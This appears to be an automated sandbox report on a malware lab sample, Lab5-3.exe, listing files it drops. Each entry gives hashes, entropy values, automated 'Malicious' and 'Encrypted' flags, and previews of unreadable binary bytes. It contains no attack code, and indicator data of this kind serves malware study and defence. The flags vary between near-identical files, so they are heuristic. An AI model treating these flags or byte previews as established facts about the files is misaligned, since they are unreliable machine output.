                                                                                                          Preview:.=...w>5h...............K%..v..As..*t.&.M..l...3..;..a..m+........c.@6.....}....3..VZ<...(....~..I9P63..4bp'.E.\.$..!/O>r.2{Ty......E.J..F....$@..a........+/iPy$.h0%1DI...]..r..3A...,.d...4..,}.....P>.........7&(..m.?.K.\J.u....p..x.....vg2T-....y......k!.....@.j.K....t!g....D..^.V.........B....M...ej8....}K5.t.y.H..P.KZ..r.G.....^..Q.-...TV.d..... .....2%C7.c=..M%.M0B-..../?..7.o...K....7(.(. .i....4L.T..... .:p.0_.......w2.%.>_+=0.V(...]G......x.oX#@M....`....?.`.5...~@P......hp*..;...S....q.."..n..\.R.>yu.u.k..H.gV....p.. #....q.d..u.....k....p.c@.s....O2 <$g.o_...V.uov....!r#.... x...c...W..4....u.f....;.l{....:w.U.y..w...5l.!S.....Bgc/..C...Z|!..C2.!..em.....}[.X..!....7...A.VQ,..l.&.Xh%....?.@...<.ze..+.3...|..N.n..7..I.Z.S\I[...M..r...~..&......y.W8]F...8.|.?i.\q..x?@#c.z`p..0....:..r.....1..2....et..........U..4.O.*.......! ]...h..z.]{..S...ei..6....e......3*L]('..]1..$.i[5...1Z..nB.G.#a....H....@..O.....`I..\\.r4Y..UZ.O.;g*...........'B
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17696
                                                                                                          Entropy (8bit):7.987577479148456
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:gyfsspq7HaEO3VpU5SC0NR27ycTk5NS3WEK0rxSL4v09g2SuSobw26bnnUwjNXpL:J8I3VTH27f+43Zrvf2SufbyvjOHRAZtb
                                                                                                          MD5:A89B168D76778CE0E37B61CBBC826193
                                                                                                          SHA1:34193F3588EDF7DBE74E577E036EEF1BA60DB6A2
                                                                                                          SHA-256:3499C6097ACAF3662DADC9C2971F43C1B87D0F291FAD65D15CB678923DB8F019
                                                                                                          SHA-512:C1F6CC000904AE65B4F79355F7F3FCECACCF6C984ED55ED2C6CB30FCDCD8F9E87C1051C3E22355D45A2CEDC2F0E8294836D587EFDD4A4316B1459E8D9EF7802E
                                                                                                          Malicious:false
                                                                                                          Preview:._n....J.S......8..../O...NM.rtQw2?r.]KJ.PC....&....B..S..,.~V`.+{..q.n.p6...d....._.,M.L.8..*;`v:....m(......]...8.U...8.cFA..QWk.{.G...1h.%.!'a......&df2.....HR......;...g..>Ws+,...-...#U...~(.h.W...............#.2.Y.fE.~p..&.l|.I......x.3..x.....W.f.S`.....D.1.I8.#.1...E.......;.=.Gl...ns..Lv.t...cC...>j...RJ.(.:\N.....n..._....UM.C:....5..h..Z@.!.M....{..*.<.*..6.<....!...C^..p`p#m.'=..^e......U.>....,.7..\..I.5=...N.,..+.,...q..-vHc..3.V.E..n..S.27.!.n.F..[:E;|..;2..z..P.<.....U........<K\.u'u...-d9.*...4.Q.5....'7OyX..3..wF..?:e..$R..9.]..il..4.....v.S..V. ....f.kB...g......bB.x.F2*},..F.....DUF...z..|0.9.......q.,..6r....N.R..Z=....q.i.q&....Fb...r.=!.&.]......j...-..*[9...i.3...t...$.Y?...W.gL.5..~.f1/C...+d.[WA....:...B..{.u..e......}.\..~......,.<.R...f..D.....ZP'.X_".c...h".....?.o ...0....$h........}....B.VZ....1.E.....|.....K..nQ..v.........).......ND...(...#1.i.T..#L.W=.....j...G,.......r..p..q.1FIk62.[..k5.a
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16304
                                                                                                          Entropy (8bit):7.987298108854162
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:oS5Ocf5+T7u0LLDODJ8yvDyRWWhmoDIXly+G0wF4atb:jAcf47u0LJ2Dm2E+G04Z
                                                                                                          MD5:B5019B0473D8EA1FA6AEBC50400A8BF2
                                                                                                          SHA1:3DBC2FC1298D951B5A0C043CEB7F86C3DB5456C6
                                                                                                          SHA-256:18E92DD6CF08884EE31B0AAA6D39BB23B9F8E956AFC74BC9D5E44FC7573F481E
                                                                                                          SHA-512:AD3757CFC87C4AC75B2305C05EF6BCE821695F66614714A48A08425AAFFF8DE9E54D77902EA73E482CDEA8CEC311115E5D7DF3547548BFA2C7E0A2995A025782
                                                                                                          Malicious:false
                                                                                                          Preview:CS@*.X.F.0g.'..b.lg.......X)..y0.....3.....!.".G...fV..Y~XFZ...%<j.V.1.L.kZ,.........r..Y..9%....4.F..4.B..u..........w.z..:.X...bQ{F.[C..OBI.. lN..z.].,}..Dv.,...?.........u.&....?.2....c...L.. .i.j..D.g......k.q)JS.&..'l/..v.d9.!.....z.'e...-}NBxH..(?.j.s.R.a....Pv.YO(u.._GW&.r.....o(..L}.......(.G.o.U.g.....k.!U..4.@f....6.m.m..[..@x;..!eN...M..<...6;cE.;........x........m..c.>.SNH.....+.........d..2<._..Y..K....M{.;......`.d..n....D...u.S54.|....t..!<y...@PE^.P.:CUZ..y....n...H.... .8..c.j....w..F.P.q~R..<.M.d..>.Ur.Jq..6..?t.).....2.=t)|.I2.0h.'.e...,....r.f.......[.J...2`r............#....:..seI..&...9t.w..k..M.x9...G..S;.C/6}"."!...j.....y3.....l"..w.L...-..j.j{u..}....D...}.`...=W.....p.....|+.~C.......?)..G...{.E..cP.+....DqZU.....t...>.E>.&Tj.j...%.r.t.._.[ Y.....@gL.......@W;.....$i....^.n...e@....st.......).O}...!.......^s..G,..~..~I.g.e....Y0f.?.....T.O.Q......T...d3'....:.y.\L.;...wu......iw#ef3H....(.'.j,K.b~(...../...p.D.O..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18400
                                                                                                          Entropy (8bit):7.990345930445932
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:osxEsNZ6uYCizspM/mj5AFxx8/QtLTXhgRMeytb:bBNlnizspMOj5q8/QtvSGTZ
                                                                                                          MD5:5CC0C5B8696C9D8B1F18C108C554CC34
                                                                                                          SHA1:56C2B91B69EBD0634C39AA1BA4B16D03833DF1B7
                                                                                                          SHA-256:5CD5A09F17F3C7E64742862CAB454114E75C50A5449D0A79489553129511F2D8
                                                                                                          SHA-512:0995AA077B3A47FD1C7F88DEFBDDCBFC732491B62B44F8FCA4D92A247529B3E8CCFA72F7A69973C406EBA27D9B1817DBD301B0B007BB1B16EB58C8D20FE6F145
                                                                                                          Malicious:true
                                                                                                          Preview:.........a.0.....v/.[...cwx.Se...eYc>.XAe.R..L...r...S.=..(v.7hO..`.....-....r}.=.?..T...2<(];V..w}w`.g......;..~....".;...|..7...~..T...ZWRUe||......U..?o..&..t...M.L....N...o..\#W+.....77...B}C...L.....ab...+..\...q......~B.v)C.#..+O..2..H.<.............EQ^...w....[....vQp..{.xgkh\..nx....E.[...DD.F.q.........C...bx..4.g....?.p}a..|..\..<p.] .....UJz.X...j..HB4Vv...F_..xc.&.Hm!..ea..s....?.G.x...7v...7.,..q..J..!....Hr..S.QR.....R.....I.xC.,.0..Gki(\..i(..@....{PU.*..I.=...O..%....ATr. !G.M..-..."..D~.$.........#(..d.%.L.qp...S.a...;.*(OyC.2....w.eK.=.Zj.:...r.G]}C.<...L.....^(.....rH.... ..1..XW......)^..p.l....)."^..zO.o..Rwc.#h.A..a..a.8......T.1>.fa.3..vA....!..3..~.4..)).q..=...&.w....y.On......b1Q@#...0.8.L...3s.e:.&E.II+8.:p+...h.F...Q...=.R*......u>...T....\E}F..u.|.62....7..W...R..[...Zqk..w2....e.....q..u-2L...::`HN...<a..............d1....*.7.1..a.'}...V.z.a..H...T.1.;.d.c..t#1...!Yu ..\7.wKhl..2".nj^.m*Lxw#..C
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16000
                                                                                                          Entropy (8bit):7.987364403341721
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:vDZzCM+kYlmxD9SBz/fRMgHt56pOvU662xzXRCZMOtb:LBgYSBz/jNQgg2xqMOZ
                                                                                                          MD5:ACC4AC773B883B7623F74B8D153615E5
                                                                                                          SHA1:E4A7F17CC218DC83A4E2D6B359AB9441617A300E
                                                                                                          SHA-256:038CCDA929C2EF053A3AF77038723594FA814B6A962A5F1A48351CB0784FDF4E
                                                                                                          SHA-512:A2D96E22AF4065166ABAB3C3CAAD3A30EA2815563E29A7BA0089E3D52398554DFA7E26540EF650BF3AAE0D251B2D2D615C1F5AE210C00B70C06C97E1129864CE
                                                                                                          Malicious:false
                                                                                                          Preview:*Z....f%..... ../...v...l..T..E...tv.r.....7.mi.H.I.L.s\R..]....{............~~...I...#....!...N[....^.h..X`..5..9BN.p-:l.- ..../.-...}......cp....@.(.0..F...[\;N.F.|.....W.FG...t...Y....$Zx..KS._......G.*.._~@wI....(.-..U....[.S.w.(;......D..Z..~..5.R.w.r..AxS.?..}.~.......W....UJ.D.s..OV..m"..<.n..=e(...e...F.)......*...L.3t........@A.J.5$...).!<......R....1.1...7.%....x.:.S......._...,`C?$.."4.%t.=..c.W...4.5:...I.F.......a....Ell)..{]....m.....B.R.eY...Q............R.>....p......Rp.z.....;v..Ou.Y.:..=........U.ZJ....8F.0s.....Sm..z.'.`...i..4J.:..#kM.........=..R....9..v..^..!t. .-..{.5.$.J...2.(...nq...\...)....?`..|...!...2.[&.Bl..9P.;,W.U..=....e......[>.6<....^'.....=......D.Y.L.j....5-..b...u.2....K...C9.n....kk..s...zzV.n...@oe.{.k...A.....8z.XM....]8..ft.:.\i.50.L.{@i.{.l..*...v.....b..L._7...,...#..2Wn......,.3.p.F$*.u......A.D.A.i.yH.V)A..$G%.).....6......D._....R...2.[..<..|......M..s...'L.....w..&.`m.=........G.....5.O
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11936
                                                                                                          Entropy (8bit):7.984651200467404
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:0nGxNgusQCaqUKCQ8iD18d4ClHQzNfrUKYwthO9BahyPnNphVUGBKkNldDO0Yzir:0GDZsh58hLSzNfrFCBEyjhKsdAt+tb
                                                                                                          MD5:4715021BE84735F6213A0E34DAD1188E
                                                                                                          SHA1:44AB4A9D6CEB492EE40428445879326998DF2606
                                                                                                          SHA-256:43A76C34A0CE88F978963D5E0B438CFD1FDFE1F513F654441C544BFE30DFFC64
                                                                                                          SHA-512:1944D3B0AD5E995FBCB4DBCDA077B9070F759E77794E0E04203BE4E17E31FD8357F35187E0F994971C6F40612E05E68EEDB08FC126F8484A677E65812310D674
                                                                                                          Malicious:false
                                                                                                          Preview:.d..yJ.0..q..7.El..d.....G..G_]...Q....K..[.M...M..p...{G.P..`Oj....;;..S..8z.q..G;.&..q.YWG.'s.RA1...S4oGh.`.a.K.....L.2.@....I(...,.|...q.[...,uP.a.'.Q.j.`..1S+...l..'j.:w.....@<.M3..X(+o7/y..+. P.+8Y06(E.A.......,..E..8uX.d_.."P=.).M....Mj.y0..G..de...6..X./2.&B\..DW(..G*.ag..........N...*..o.2*.Tt.......jU..,.`....s..v.A....F.bQ....}..~:....."w^...B5.K%...C..(x..U.h.;B ...].K....|.!.M.f.....t.AX.....i.}.."....................n'....!..~.....l.8.#.!.suS.3..].C.....9VL......0.X.......A.Ph.....b..6.e..@.M1.f.g..._..r.C..E,..?@D,..u9.(aB.U.a;.f..`{.o.x}a.S.3y..?.E.9..d..9.q.9.I..w]3...^.|K%..|.._E.69...y:....kx..$.J.S.n.Y.#...O.f.v.j;o,.06AK....,."Vz..so.I..a.......8...p*a`.\.2.f.o..}.W4..k..Z.wP.|.._.Y..].6.....=..sH..g.[...>.`.@....w...H..{~ov?R{mv\ ..f..}.]F.l)W...35..%.R.TU.`.....r&..`..xf.T*...._.B....OI..H._C,...e\....%.....XD.J.....wE.&....uEB-T...X.X.P...w..V.F...1`.G..Y.... xCY.z....]]..B.g!..A..w:._K.j..k..s...G.YMg... ..e.*`p.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16000
                                                                                                          Entropy (8bit):7.988701918635406
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:UDFAFVg7ExxHHuyiORnHZQwNYXgEZXBblyCqU94o1dtotb:JCuxHHvnHqgYQEhBblyCqkX36Z
                                                                                                          MD5:9E66DEEFBF1486E56E7EA61877001509
                                                                                                          SHA1:B04C165652D2A0EF90AA4968E4BC4A4B26B1F51B
                                                                                                          SHA-256:BD95AFC5A6268F1CD0CE6D4F249A79E09165BA29CC8A7623F39630D3BA4AB805
                                                                                                          SHA-512:8F67886DCAC1010A92CF29D3FCC0CD4DC6A6BE2E94B0E2A6137E2C23557AA48BD7953BBF2B5A1CDF1F40B73D190E5CA55BA51B91B4ACB9CC79C6C6E037D117C2
                                                                                                          Malicious:false
                                                                                                          Preview:q,....0.o..M.T[...O.Q......K.../)Z..c.\..S.S...8h.?.....n-.%h..,..T...}]3.L.Q..D...6.......%...q.qP^..H5.z.j........T9.(@4..../R=BE.N.5...9u...[B...7x...J....._.D..]P.....l.nS.j...}[..`..........O..<.*[j._..PQ.....[....d..E.a..U[.H.F3......w.O..2....<?.....7......n.../..V..`..n3p...P....Mrdi.!......D....c..}L.<........l..&....F.-|.4%..c..{ey....`}.......L..7....Y4;.n..R...k^cxu....xm.r../+.B..G7.zd......m..eU....i.......@R.RO6..].ce.......:H/..4b.....51...V:..k........d.M......cM4.a*v...M}h..^..jq..M...5.'.._x.[.....Sg..ku..,.......<.S...4+..i|FI.$..6.....,..E..=..0.G.\........f...EvT..z..Nv...R`....2.W...D......zC4p.(O..{..;.Xl....0:....x..Dw&.,F.y;.K..}..4..XU..O.O._.....?Mw..Co...k....f....6/..C.....%......<...q[M.y0.-..V_...9....9..U.s.......`.X/..A....p.zFs....ZH...b.nW..........\9$...rEs....].'..\.g.$(..h.8q...2h.q)2..zY.,c.."-~M.......an5s$..9....JU...8.`i...oS#..'5.'H,..S[..........y'.\...DC.+......bc.c.plc...K...Z.D...4(.[..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18208
                                                                                                          Entropy (8bit):7.991035278425591
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:jIzJpEdAWBvZ2AtwfFyQgWQ6mO15CR2zMTLEy/3ZVkjHtb:c9pEhvzwfwQnHDfMTLliHZ
                                                                                                          MD5:37E5277F70241399BA7E833264C0A0CD
                                                                                                          SHA1:37CC34E4B87A8DE3746223EE7E4429468EB25E9E
                                                                                                          SHA-256:4E19407E3AD463749C42F4C5728BB06C062FBD06C6884520906B2E82E3E93E05
                                                                                                          SHA-512:98EC65E081A47B5A19C3A40AD1E383C0CF3A7F54C9CC6C72088DA9579AC1B4515F3B7DCE5C58957175C113992633CF2978ECB80B6BB267E3792E77566E0705A2
                                                                                                          Malicious:true
                                                                                                          Preview:.{...I.BPr.....!.......<..sZ......D...3.....k.+.....n8...s........i.W`.'.9_X`&.0...K...O...T.._Y.n.;.?.._...D...5....u.a...n.v..(..1....$.d=....KC@..lJ.a..jq..b8.-.:....a..X..)....^...S...c.b.:..H4.T.m./.x......n.I.M..m..&...N..B.5!....'.r.ST.........u....)}j..z....z~+e9...C....6...j....U.r.*...9Y.....Fn.....D.}.h,.P.P..."...Z..2...C..L/.uZ>.r,.........&..s.``.2r....`.|f0.3.A.......cZ.M.0....7..YR..?W....|...(5...*EYvF}F.N.W.Y...L.s.....?-...w.|..#....9vvNT.l...b......n..x.v..l.~4......;.;.l......R...p9l.5f.<d...!..!{.....k'g..c..T......v..b.m..G.....P.J ...>)x^.V.Qt..w...U-...L.S^..H...}.._K8.WZY.~..b.1...G..A3...K.S........Tm3..I....-TC.e..9.iy..GH_...l.W..iQ..w./F..l)V.....O...j)..;.[dL1I..z.....Y.{,E.yHD......z...d..0..%...t|.....T.q..8.....F.L.wXn......8."..&7....g.D..o."l..O....c.E......J.7..v.}......Q..t.J....HbZ..].9..J...[.)]..V&..Y...i^.1.R....#x...l.$@.$\n..7..g~.y..(OOT...k.....D4...b3..W..Z...3.a..A.e...FQ........h.......,
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17904
                                                                                                          Entropy (8bit):7.990124648339922
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:lvW/UIZLvDggXKxLaVe2E7tWbG/4pddxUETEUfcxD9YvfLtb:lO/JFr6xLaw22t0G/4HfP66HLZ
                                                                                                          MD5:357B8FA79CAF608309FC0D3106A5267B
                                                                                                          SHA1:FAEE4BBA5C405BCA33AD48DD11FF6A7B0C92E847
                                                                                                          SHA-256:5F38F233D1291C2F4FE1922C8086049286B119D0424651BC1EF0C4C32C3613D9
                                                                                                          SHA-512:107EEE22978CC400188D0360C261DB5E1E7FEA796E7C2CBAF98782D0583D247328D8661B124B8156B5F5BDE420619E2695BC1C113EB423FEBF15CE28B8B29CFC
                                                                                                          Malicious:true
                                                                                                          Preview:N.PZ%.!?.....Ud..B..#.B.T.(......:..I.W.......vv~.kb...P.#A.u...;..2m.nGK._t.Wy=.~i1..3....o....J......0..%T..T....E.#.Mj3....[...........h...k..w..D$!...y.8..ejn..LD.......P.o.."w.o..F....yF, ...'L..8..u...R...Y{....)..=Y.F.9..^...)'f.0..p...._,.^.<...(7?.a;6...*...C.UZ3.ra.....Q,.=lW..d....N[3./.$u..z.}.I..'.EuQ.O^MgG..v.a......<.....;..].P.A..a..'N. ."5S.u. ...L.*...pe....Q.D.g...j../.(.......s....xE..j..IN..#."..G......M.....$...b.Z.......Q..=...m..`E..}..iB...(#b.,..&.....b....K.=...d_/l<..P.....PQC.u...bOa....m.+K..d.....$*....)..`4.J.DH...u4oElbz1.G...<..WI.....%C.P.?$.].ad.%Q....+.m.cI...m........:....E....vt`.d.......D.....*.U.I.6.t)....A ...9oUT..,....V!.....mf..J....X...KT*.X.N..-...........dj..1#.~`TG$ \.0....*;..?=..9..s....slr...6......:#J.......XDt..{..Aw..O>.o..-.1.....b.b.P.....U...0...........,$...?.A.G.GB.kO.b...L..HFsd..d..*Io%.$.f.....b.8...Q......e.k@.4..!.K.../.....9..f.....r4.KW."..F.....IC/.vr.9..._.@~9...1}..N+I
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17728
                                                                                                          Entropy (8bit):7.988887357591603
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Ht4wJxyJarNbLtwHILfkterEd7yWROs/4VNFHRk5tb:Hia5rTwHILcMrEdLoseRk5Z
                                                                                                          MD5:F1525BEE0FBA3279860E3C70C25A1319
                                                                                                          SHA1:70E79F6E231C851AE4E9114CE5095B9438F1C563
                                                                                                          SHA-256:32CE8B05BFDCA0222959CF8CAFF2FB9EA08BE1BB89014C9A34577E4734800AA6
                                                                                                          SHA-512:625513855124FE1F571EAA76F82EEFFC2C81112A45FB4C60C7201E9BE9D087224198D93DD2B1A4A0A111F53B51F1B42D8769078C6431F624D76F119987DEE7F5
                                                                                                          Malicious:false
                                                                                                          Preview:.]{."{ E0....=T.......9)..v.......h3H......&...o....{X#.....o ...@...%..>y&..DI.......r..Bc..b.G..).A.A....-....c.G..A.lPG.}h..)|XEuLM..<U.%wE#.#.z.?..h..3..s.a^K@;..a1!...!+.........x.8....u;.U.4.Q...T..,vA....Rc.DdJ.&z....Y....:ph7M.y..~..t.x-..b.m....U.i.m1S.W...^.....P.-.....{.,.4...A*....x.-i...C...h..m..q.\..8.pn...AJ....?...R]./....+.!..#.......+exO.~9q..2*.l<.....v..<....(.j.2^....'..W.p.v._...P...k#.n.Y..-S.,...F..@..m.a...`d.*3..2.5..........W...i..."n...5..t..u%..RZ.2'.R...8....S.k.....Ypj...T.=p.......R_1.......,,......q.'.t...#F..2.t..}..<..RS0Jn..p.9...3..~.0.a.&1l_.......p...l.,.fD...t.hL..8Q.=f.B9.h..g.D...W.:....)......U......R[m...912.c.._aA..4....i./...~..9.p..d....r....4.4{..Z..fk..\7}.S.A..ki#.glk..%......F].....(.~..*.WN..@.Pw.[.!....)b.0.q(R.:..hH..>...U...S67...(.J...<.s.73....E.B1e..zk/..c..k..ClG...ch-..Rt_,H.........2if.......n.DL.T........@1.....<....t.|.#/]...WjG..H...+.$>.@.Se...,......H|..RE.....-o.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18544
                                                                                                          Entropy (8bit):7.989093490375104
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:5snwfgg9oWy3xjgdrMYfSVlsdThTZPhDgfP0Rd2c0tb:5uwfUNuZMOSViNhZZDgfsRd2c0Z
                                                                                                          MD5:E6ED48B94033B4EFCA509884D20E0197
                                                                                                          SHA1:54E118CBF9BB12F4B5CD4BEE1BCDC2B72A0F5912
                                                                                                          SHA-256:6FD1EB512468E226433D0091530138E9AD37F619C86EB7E461BF3D32B1BC1BA7
                                                                                                          SHA-512:C4FCE43834D95C1C73252B41A83F82F641B2DDCC6A72335CB67DB9334B474C28EE5996773E269FB66765BD9D3A92BD0BB73C2BFC9DBCB3FA2960C3E0289D70F3
                                                                                                          Malicious:false
                                                                                                          Preview:...4.d..^..=.g.P..SC.7..u...(.f9.oT.c.....o....y".C...n.Y.c.4.$.<E+M.`XC..........3%4P:...%.]1.h.h.!h.....B....%.V.(...R.&@......J..-cGw........VP...}..y<....6.x..d..............F+'_w.'&.......5q....BR3.....0..Hm...........n..A.Q.. ..U.7V.W........{.-..A/..OZ...S./..'.f..2....8.l..;....q......IL.m..N^....[..K.ey.._..W.F..?)...r..N...v.q......nm..^.F.\gg.B../..*.c..i....@..pj..u.K8USJW..l..j......2S..F....y,+.D.!{g`...s...uv~.9. ...@...@..gAB.l...[.^..t...V.....#6r...z*...v.....,..x...^m....jfl&..!.>.T.,.M.Y.H&...x.HO.N....+.#.3.zb.).h..H....sL.....'Mi.a...^.^......@..gf...4.Y.....p..O...(...f......O....8&;G.w#{V.. )x..H..1.6.f...^^+.....G...I.G.W......5....!...f...K.....AX.k.&T..=........0o..0.k....R.H...aw..[.&..l.A.8b......4..!...x.m......ER...U.T^H0).Mo......g..A.".G.0./G..:._z.`..................l...t^...?.B5R..o.L.....(...f.)....O.9.l..pX...>".{D..6...f;..{..3.i..$+.n#..g.;=...'.]^owL..s...H...'..?....2.9"L@'Kr.D.-.SU..Z...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18544
                                                                                                          Entropy (8bit):7.989198927700433
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:u24PkqDP7E3JDpBzvdN54jwBUeg6nSMq1jhF6HsMW1P8TPOtb:u2uDYD3FN54p6fqDMHsFMOZ
                                                                                                          MD5:6276410D75B3D42736F72AAD41AFA72E
                                                                                                          SHA1:FF460C602A7DE3D7DEFF76DB243956F0039089BE
                                                                                                          SHA-256:24A40BF40C45500373CEA3C974B9B87A7DF37C14CEE109C336A443F9605EED57
                                                                                                          SHA-512:1E3E6E4CA0C1AACC3CED63AC27E7E9515FC20156F2042DA3A5F6BC7B7328A31636F8A2F43EFD97A1685C47043E5DD3779455B555D94CF90523BE1AF9A3F56CAF
                                                                                                          Malicious:false
                                                                                                          Preview:.M ......nM.a'.">"P.o+.N.j.X..wW9?..ak...K..`|.}..!z~...*...$.M..3.:i.{.Ie.d}...}u.r.&o..9X.yF..sj..}.&,....5:7NP.(...{).c.59.8>....*y{BrT*.^WE..... ...{..+=..Y...{..e..E..o.m...._..I .].u..Z.Ia..s.4%.321.A...{A..m.W.t...O...*..4.R..{...Y;...z..i.......;..8....^...C.C....2PeU.....\...."J....A...0/O.c-`y.*t.y3..w..8..RyJ..1m.P;.oTo....l....ry..:.....%\/.....@UKJ6.:B.j.....?i.9|.]}..h....)..s*..._..7..4.9.K........V%.,..P....~[..q....`).....4..0.L...Q...&..'.....]r....5..|...{.F.c..U1.3.7.J.cJ.h{g.y.Jn....~.......q..'J..T#.H.%J.&..3...:.@R"..X....9O;.e..^[...'F...}....y>(|F(.VOk.....@I..w..a..R..B..../.. ...]...x....G.?W.8.Zw..9...............^.a>.3.t.R..ro......`.v......w..mv|..Ss....(..-.W{. ./._.<.e...w6l.pw....W.0`..zQ1.V.h6X......:...GP..,..K.....U..u,.I.D.P..r.[...P..v.....kZ.a...,>y..b....p.).......6!..j.....g...'..F.S.W9.CvR7..S@....y3%.c..i~<..RHJ....pY+..N/=...Y..."-9c=......'.....Q.Q...B...F..w..^...Zx.Mv..p=h..?v.c+....9..Z.fL.X
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17280
                                                                                                          Entropy (8bit):7.988089119120472
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:8uQOsDwZPgN6aTXu4O4hsz2EOCwsDt04zbXoYewVPjyYlI2nYLUdZ2esRabBk7KD:8uuYoRhqSEOXsJBztyWI0O4zgYttb
                                                                                                          MD5:468C54A0688C8CAD458BAF9A5B17026A
                                                                                                          SHA1:D2AAC51060A7B8F6D665294548B8A89DD72CCF1B
                                                                                                          SHA-256:AF6887221674477344B446F110E8CFFA7242DD7BBA3246A0E2C88D5D88129DBD
                                                                                                          SHA-512:95C3E5E768200361C6D6C49C286DFE9E92108606D2FB90231249FD6F54550EE095D945C292889EEE24FAEFFC3D49650775C68A7C42CBE6FB7007BA3B1BEF337E
                                                                                                          Malicious:false
                                                                                                          Preview:......7dXS.a`....*.}...;j]\l.)...<..M,.w.@..U.`.........<..{..F..oD.Vd.v..S..G..Zlqd.....<..5t..ZFa....kt.....F..0...d.8.[G.|..C.1".^..N..,.i_.q?....l.Fp..b..Q/.Gm..I.....K0>..e..ZX......+...p...!X.......1..Z....a....~x.6....J....O.t<.',;........{U.5B...... ..>...Oi.d....EI-8t.n.{.Sl...b...g.l&2...t.D>..M.G....:WU...u.U.V6.=...c........1.pf..\....G,B..=A..U....f.3b?.}.BO i_....A.q....7...N.d.?H.v..............t........~..7..Y.x.....:...D.....U9c..9.."?.....Kf...;c...r..G' ..[..]...R..Z...IAyZ.q.w..g. ....Z.......U\$..O..}.Th..@r. ..m\T.H..d...fA.....#..,n.^d.GP....l....<........vE..34......xn....7.Hd1..y[._...G.....4*...wM..z...u..v..V.`7s.......&.Pt..%2#0&.'..eA.....h......:.e.&LKX.c..2.:..{..\..o..o..an#..bt.1.... .q:B6...F8........1?.......y....z]...B%........M,P....+.(UQ.a5....^......q....r}<...ah.8...[D7....TO...H.zGS..+.6$q...G...[.......}h.W.....""B.r.L....f3...n.kXi."H...!..............l.~O;/~3LE.9.>\..K.....!l....3
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18080
                                                                                                          Entropy (8bit):7.988655713044091
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:mSl/8Yg/vVWmrL36L0eBGL59CaPoUQTQms5/KhQhaftb:pl/Xg/gmrGL0eBGF9ZoUX5/KhQkfZ
                                                                                                          MD5:367FCF3DF81B9D9A305EA22514133421
                                                                                                          SHA1:1D7BF13787A4F81E59CF804937B9CDEBCF273BD4
                                                                                                          SHA-256:7FE2B0BDEA91B37E861A1E5D491497E2A024EC6DCE8C6BD65249327A891759BD
                                                                                                          SHA-512:D49F3DE9CF8F5EACE76663AA349344F9280967BFCE8EF30FD89A54C44A769A801264FB757E0FB5A9C82239E39E7A90CD9C1CB462E562F1F88CE3DB0A91144C63
                                                                                                          Malicious:false
                                                                                                          Preview:...2..(...0.M...jE./...bH..p8{.V...YiH..e.P.:..?......B. _.{+.;.*.........n..i.0..m...vM...0.B6...(.o..eAJW..g..^K.8W\(uKv..........)p..qv.0..9.Ka.A.gUF.#..dK^.SE...H.;....d.2.....bf|..U(....r.z....J...Pme..].A......)..._9..%D.....I...r.9......M..V._....b...3...g8r.:k...%g.}..AR......."..)|.2C{?.z.wcP.m.$n....:"...tW..-.x$.......:|z..3p/.C:<y).g"...?r.:...#.'..N...=..[....#...F.2.....2/-.(..p!.X..WxAc....t....L.&.+&u`?....%.#...;..h.gQp6.l...Xb.....v$.v..J$.\.G..N.s$b.:.65..b.'.?...k.d).I[......2.%hX...b..>s..`..x...D,`i%....q`.*.oB....+.....E'...n.j..86 .J(.....V.V9.c.NV.l.{... ..J.O..E,........j..@.^v...G...(b......&QIw.ti.^.....\p..\_.=.s..P......p..H.....R.+..O.%U....Mp)./..k./...l...|.Fw..Z.1..Cv.U./$.6.f....S{..G)s.V...^O...w1.vX.....Mu.IQ...[.n.#..........+..1..q%.1...T...........e.....j..y.....mvIy.#?..........^cS.l...Se].&.Q.p~>...G......l..<.c.(......D.Dk.<;.B..h...qG....s.....]F/S\...Ql......k...7.......<..Y.-.|4$^.._v/.1..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17056
                                                                                                          Entropy (8bit):7.989718370989186
                                                                                                          Encrypted:false
